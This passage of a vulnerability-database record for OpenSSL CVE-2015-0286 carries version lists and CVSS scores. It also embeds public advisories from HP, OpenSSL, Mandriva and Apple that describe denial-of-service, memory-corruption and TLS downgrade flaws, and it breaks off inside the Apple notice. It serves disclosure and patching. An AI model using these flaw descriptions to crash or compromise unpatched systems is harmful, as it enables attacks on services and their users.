{ "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8ze", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-0286" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stephen Henson", "sources": [ { "db": "BID", "id": "73225" } ], "trust": 0.3 }, "cve": "CVE-2015-0286", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-0286", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-0286", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-0286", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0286" }, { "db": "JVNDB", "id": "JVNDB-2015-001881" }, { "db": "NVD", "id": "CVE-2015-0286" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.509 certificate to an endpoint that uses the certificate-verification feature. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04626468\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04626468\nVersion: 1\n\nHPSBGN03306 rev.1 - HP IceWall SSO MCRP, SSO Dfw, and SSO Agent running\nOpenSSL, Remote Denial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-04-06\nLast Updated: 2015-04-06\n\nPotential Security Impact: Remote Denial of Service (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\n Potential security vulnerabilities have been identified with HP IceWall SSO\nMCRP, SSO Dfw, and SSO Agent running OpenSSL. The vulnerabilities could be\nexploited remotely resulting in Denial of Service (DoS). \n\nReferences:\n\n CVE-2015-0209\n CVE-2015-0286\n CVE-2015-0287\n CVE-2015-0288\n CVE-2015-0289\n SSRT102007\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n HP IceWall MCRP version 2.1, 2.1 SP1, 2.1 SP2, and 3.0\n HP IceWall SSO Dfw version 8.0, 8.0 R1, 8.0 R2, 8.0 R3, and 10.0\n HP IceWall SSO Agent version 8.0 and 8.0 2007 Update Release 2\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP recommends the following software updates or workarounds to resolve the\nvulnerabilities for HP IceWall SSO MCRP, SSO Dfw, and SSO Agent. \n\n Workaround for HP IceWall SSO MCRP:\n\n - If possible, do not use the CLIENT_CERT and CLIENT_CERTKEY settings in\nthe host configuration file. Not setting these will prevent MCRP from using\nthose client certificates for communicating with the back-end web servers. \n\n - If the CLIENT_CERT and CLIENT_CERTKEY settings must be used, then there\nis no workaround other than applying a vendor patch for OpenSSL for these\nvulnerabilities. \n\n Workaround for HP IceWall SSO Dfw and SSO Agent:\n\n - If possible, do not use client certificates for SSL communication\nbetween the client and server which are running HP IceWall SSO Dfw or SSO\nAgent. \n\n - If client certificates for SSL communication between the client and\nserver must be used, then there is no workaround other than applying a vendor\npatch for OpenSSL for these vulnerabilities. \n\n Software updates to resolve the vulnerabilities for OpenSSL:\n\n 1. IceWall SSO Dfw 10.0 running on RHEL could be using either the OS\nbundled OpenSSL library or the OpenSSL bundled with HP IceWall. If still\nusing the OpenSSL bundled with HP IceWall, please switch to the OpenSSL\nlibrary bundled with the OS, and then follow the instructions in step 3. \n\n Documents are available at the following location with instructions to\nswitch to the OS bundled OpenSSL library:\n\n http://www.hp.com/jp/icewall_patchaccess\n\n 2. For IceWall SSO Dfw 8.0, 8.0 R1, 8.0 R2, 8.0 R3 which bundle OpenSSL,\nplease download the updated OpenSSL at the following location:\n\n http://www.hp.com/jp/icewall_patchaccess\n\n 3. For IceWall products running on HP-UX which are using the OS bundled\nOpenSSL, please apply the HP-UX OpenSSL update for openssl-0.9.8zf when it is\navailable from the following location:\n\n https://h20392.www2.hp.com/portal/swdepot/displayInstallInfo.do?product\nNumber=OPENSSL11I\n\nNote: The HP IceWall product is only available in Japan. \n\nHISTORY\nVersion:1 (rev.1) - 6 April 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. OpenSSL Security Advisory [19 Mar 2015]\n=======================================\n\nOpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)\n=====================================================\n\nSeverity: High\n\nIf a client connects to an OpenSSL 1.0.2 server and renegotiates with an\ninvalid signature algorithms extension a NULL pointer dereference will occur. \nThis can be exploited in a DoS attack against the server. \n\nThis issue was was reported to OpenSSL on 26th February 2015 by David Ramos\nof Stanford University. The fix was developed by Stephen Henson and Matt\nCaswell of the OpenSSL development team. \n\nReclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)\n============================================================================\n\nSeverity: High\n\nThis security issue was previously announced by the OpenSSL project and\nclassified as \"low\" severity. This severity rating has now been changed to\n\"high\". \n\nThis was classified low because it was originally thought that server RSA\nexport ciphersuite support was rare: a client was only vulnerable to a MITM\nattack against a server which supports an RSA export ciphersuite. Recent\nstudies have shown that RSA export ciphersuites support is far more common. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1k. \nOpenSSL 1.0.0 users should upgrade to 1.0.0p. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zd. \n\nThis issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan\nBhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen\nHenson of the OpenSSL core team. It was previously announced in the OpenSSL\nsecurity advisory on 8th January 2015. \n\nMultiblock corrupted pointer (CVE-2015-0290)\n============================================\n\nSeverity: Moderate\n\nOpenSSL 1.0.2 introduced the \"multiblock\" performance improvement. This feature\nonly applies on 64 bit x86 architecture platforms that support AES NI\ninstructions. A defect in the implementation of \"multiblock\" can cause OpenSSL\u0027s\ninternal write buffer to become incorrectly set to NULL when using non-blocking\nIO. Typically, when the user application is using a socket BIO for writing, this\nwill only result in a failed connection. However if some other BIO is used then\nit is likely that a segmentation fault will be triggered, thus enabling a\npotential DoS attack. \n\nThis issue was reported to OpenSSL on 13th February 2015 by Daniel Danner and\nRainer Mueller. The fix was developed by Matt Caswell of the OpenSSL development\nteam. \n\nSegmentation fault in DTLSv1_listen (CVE-2015-0207)\n===================================================\n\nSeverity: Moderate\n\nThe DTLSv1_listen function is intended to be stateless and processes the initial\nClientHello from many peers. It is common for user code to loop over the call to\nDTLSv1_listen until a valid ClientHello is received with an associated cookie. A\ndefect in the implementation of DTLSv1_listen means that state is preserved in\nthe SSL object from one invocation to the next that can lead to a segmentation\nfault. Errors processing the initial ClientHello can trigger this scenario. An\nexample of such an error could be that a DTLS1.0 only client is attempting to\nconnect to a DTLS1.2 only server. \n\nThis issue was reported to OpenSSL on 27th January 2015 by Per Allansson. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSegmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)\n===================================================\n\nSeverity: Moderate\n\nThe function ASN1_TYPE_cmp will crash with an invalid read if an attempt is\nmade to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check\ncertificate signature algorithm consistency this can be used to crash any\ncertificate verification operation and exploited in a DoS attack. Any\napplication which performs certificate verification is vulnerable including\nOpenSSL clients and servers which enable client authentication. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered and fixed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nSegmentation fault for invalid PSS parameters (CVE-2015-0208)\n=============================================================\n\nSeverity: Moderate\n\nThe signature verification routines will crash with a NULL pointer\ndereference if presented with an ASN.1 signature using the RSA PSS\nalgorithm and invalid parameters. Since these routines are used to verify\ncertificate signature algorithms this can be used to crash any\ncertificate verification operation and exploited in a DoS attack. Any\napplication which performs certificate verification is vulnerable including\nOpenSSL clients and servers which enable client authentication. \n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\n\nThis issue was was reported to OpenSSL on 31st January 2015 by Brian Carpenter\nand a fix developed by Stephen Henson of the OpenSSL development team. \n\nASN.1 structure reuse memory corruption (CVE-2015-0287)\n=======================================================\n\nSeverity: Moderate\n\nReusing a structure in ASN.1 parsing may allow an attacker to cause\nmemory corruption via an invalid write. Such reuse is and has been\nstrongly discouraged and is believed to be rare. \n\nApplications that parse structures containing CHOICE or ANY DEFINED BY\ncomponents may be affected. Certificate parsing (d2i_X509 and related\nfunctions) are however not affected. OpenSSL clients and servers are\nnot affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Emilia K\u00e4sper and a fix developed by\nStephen Henson of the OpenSSL development team. \n\nPKCS7 NULL pointer dereferences (CVE-2015-0289)\n===============================================\n\nSeverity: Moderate\n\nThe PKCS#7 parsing code does not handle missing outer ContentInfo correctly. \nAn attacker can craft malformed ASN.1-encoded PKCS#7 blobs with\nmissing content and trigger a NULL pointer dereference on parsing. \n\nApplications that verify PKCS#7 signatures, decrypt PKCS#7 data or\notherwise parse PKCS#7 structures from untrusted sources are\naffected. OpenSSL clients and servers are not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was reported to OpenSSL on February 16th 2015 by Michal\nZalewski (Google) and a fix developed by Emilia K\u00e4sper of the OpenSSL\ndevelopment team. \n\nBase64 decode (CVE-2015-0292)\n=============================\n\nSeverity: Moderate\n\nA vulnerability existed in previous versions of OpenSSL related to the\nprocessing of base64 encoded data. Any code path that reads base64 data from an\nuntrusted source could be affected (such as the PEM processing routines). \nMaliciously crafted base 64 data could trigger a segmenation fault or memory\ncorruption. \n\nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 0.9.8 users should upgrade to 0.9.8za. This issue was originally reported by\nRobert Dugal and subsequently by David Ramos. \n\nDoS via reachable assert in SSLv2 servers (CVE-2015-0293)\n=========================================================\n\nSeverity: Moderate\n\nA malicious client can trigger an OPENSSL_assert (i.e., an abort) in\nservers that both support SSLv2 and enable export cipher suites by sending\na specially crafted SSLv2 CLIENT-MASTER-KEY message. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Sean Burford (Google) and Emilia K\u00e4sper\n(OpenSSL development team) in March 2015 and the fix was developed by\nEmilia K\u00e4sper. \n\nEmpty CKE with client auth and DHE (CVE-2015-1787)\n==================================================\n\nSeverity: Moderate\n\nIf client auth is used then a server can seg fault in the event of a DHE\nciphersuite being selected and a zero length ClientKeyExchange message being\nsent by the client. This could be exploited in a DoS attack. \n\nThis issue was discovered and the fix was developed by Matt Caswell of the\nOpenSSL development team. \n\nHandshake with unseeded PRNG (CVE-2015-0285)\n============================================\n\nSeverity: Low\n\nUnder certain conditions an OpenSSL 1.0.2 client can complete a handshake with\nan unseeded PRNG. The conditions are:\n- The client is on a platform where the PRNG has not been seeded automatically,\nand the user has not seeded manually\n- A protocol specific client method version has been used (i.e. not\nSSL_client_methodv23)\n- A ciphersuite is used that does not require additional random data from the\nPRNG beyond the initial ClientHello client random (e.g. PSK-RC4-SHA). \n\nIf the handshake succeeds then the client random that has been used will have\nbeen generated from a PRNG with insufficient entropy and therefore the output\nmay be predictable. \n\nFor example using the following command with an unseeded openssl will succeed on\nan unpatched platform:\n\nopenssl s_client -psk 1a2b3c4d -tls1_2 -cipher PSK-RC4-SHA\n\nThis issue affects OpenSSL version: 1.0.2\n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a. \n\nThis issue was discovered and the fix was developed by Matt Caswell of the\nOpenSSL development team. \n\nUse After Free following d2i_ECPrivatekey error (CVE-2015-0209)\n===============================================================\n\nSeverity: Low\n\nA malformed EC private key file consumed via the d2i_ECPrivateKey function could\ncause a use after free condition. This, in turn, could cause a double\nfree in several private key parsing functions (such as d2i_PrivateKey\nor EVP_PKCS82PKEY) and could lead to a DoS attack or memory corruption\nfor applications that receive EC private keys from untrusted\nsources. This scenario is considered rare. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by the BoringSSL project and fixed in their commit\n517073cd4b. The OpenSSL fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nX509_to_X509_REQ NULL pointer deref (CVE-2015-0288)\n===================================================\n\nSeverity: Low\n\nThe function X509_to_X509_REQ will crash with a NULL pointer dereference if\nthe certificate key is invalid. This function is rarely used in practice. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2a\nOpenSSL 1.0.1 users should upgrade to 1.0.1m. \nOpenSSL 1.0.0 users should upgrade to 1.0.0r. \nOpenSSL 0.9.8 users should upgrade to 0.9.8zf. \n\nThis issue was discovered by Brian Carpenter and a fix developed by Stephen\nHenson of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions\n1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these\nreleases will be provided after that date. Users of these releases are advised\nto upgrade. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20150319.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/about/secpolicy.html\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2015:062\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : openssl\n Date : March 27, 2015\n Affected: Business Server 2.0\n _______________________________________________________________________\n\n Problem Description:\n\n Multiple vulnerabilities has been discovered and corrected in openssl:\n \n Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL\n through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows\n remote attackers to inject data across sessions or cause a denial of\n service (use-after-free and parsing error) via an SSL connection in\n a multithreaded environment (CVE-2010-5298). \n \n The Montgomery ladder implementation in OpenSSL through 1.0.0l does\n not ensure that certain swap operations have a constant-time behavior,\n which makes it easier for local users to obtain ECDSA nonces via a\n FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). \n \n The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before\n 1.0.1g do not properly handle Heartbeat Extension packets, which allows\n remote attackers to obtain sensitive information from process memory\n via crafted packets that trigger a buffer over-read, as demonstrated\n by reading private keys, related to d1_both.c and t1_lib.c, aka the\n Heartbleed bug (CVE-2014-0160). \n \n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before\n 1.0.1h does not properly restrict processing of ChangeCipherSpec\n messages, which allows man-in-the-middle attackers to trigger use of a\n zero-length master key in certain OpenSSL-to-OpenSSL communications,\n and consequently hijack sessions or obtain sensitive information,\n via a crafted TLS handshake, aka the CCS Injection vulnerability\n (CVE-2014-0224). \n \n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the POODLE issue (CVE-2014-3566). \n \n The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before\n 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square\n of a BIGNUM value, which might make it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors,\n related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and\n crypto/bn/bn_asm.c (CVE-2014-3570). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote\n SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger\n a loss of forward secrecy by omitting the ServerKeyExchange message\n (CVE-2014-3572). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL\n servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate\n brute-force decryption by offering a weak ephemeral RSA key in a\n noncompliant role, related to the FREAK issue. NOTE: the scope of\n this CVE is only client code based on OpenSSL, not EXPORT_RSA issues\n associated with servers or other TLS implementations (CVE-2015-0204). \n \n The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before\n 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a\n Diffie-Hellman (DH) certificate without requiring a CertificateVerify\n message, which allows remote attackers to obtain access without\n knowledge of a private key via crafted TLS Handshake Protocol traffic\n to a server that recognizes a Certification Authority with DH support\n (CVE-2015-0205). \n \n The updated packages have been upgraded to the 1.0.1m version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\n http://openssl.org/news/secadv_20150108.txt\n http://openssl.org/news/secadv_20150319.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm\n 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm\n a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm \n 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-09-16-1 iOS 9\n\niOS 9 is now available and addresses the following:\n\nApple Pay\nAvailable for: iPhone 6, iPad mini 3, and iPad Air 2\nImpact: Some cards may allow a terminal to retrieve limited recent\ntransaction information when making a payment\nDescription: The transaction log functionality was enabled in\ncertain configurations. This issue was addressed by removing the\ntransaction log functionality. \nCVE-ID\nCVE-2015-5916\n\nAppleKeyStore\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A local attacker may be able to reset failed passcode\nattempts with an iOS backup\nDescription: An issue existed in resetting failed passcode attempts\nwith a backup of the iOS device. This was addressed through improved\npasscode failure logic. \nCVE-ID\nCVE-2015-5850 : an anonymous researcher\n\nApplication Store\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Clicking a malicious ITMS link may lead to a denial of\nservice in an enterprise-signed application\nDescription: An issue existed with installation through ITMS links. \nThis was addressed through additional installation verification. \nCVE-ID\nCVE-2015-5856 : Zhaofeng Chen, Hui Xue, and Tao (Lenx) Wei of\nFireEye, Inc. \n\nAudio\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Playing a malicious audio file may lead to an unexpected\napplication termination\nDescription: A memory corruption issue existed in the handling of\naudio files. This issue issue was addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:\nProf. Taekyoung Kwon), Yonsei University, Seoul, Korea\n\nCertificate Trust Policy\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: Update to the certificate trust policy\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT204132. \n\nCFNetwork\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: A person with physical access to an iOS device may read\ncache data from Apple apps\nDescription: Cache data was encrypted with a key protected only by\nthe hardware UID. This issue was addressed by encrypting the cache\ndata with a key protected by the hardware UID and the user\u0027s\npasscode. \nCVE-ID\nCVE-2015-5898 : Andreas Kurtz of NESO Security Labs\n\nCFNetwork Cookies\nAvailable for: iPhone 4s and later,\niPod touch (5th generation) and later, iPad 2 and later\nImpact: An attacker in a privileged network position can track a\nuser\u0027s activity\nDescription: A cross-domain cookie issue existed in the handling of\ntop level domains. The issue was address through improved\nrestrictions of cookie creation. \nCVE-ID\nCVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua\nUniversity\n\nCFNetwork Cookies\nAvailable for: iPhone 4s and later,\niPod 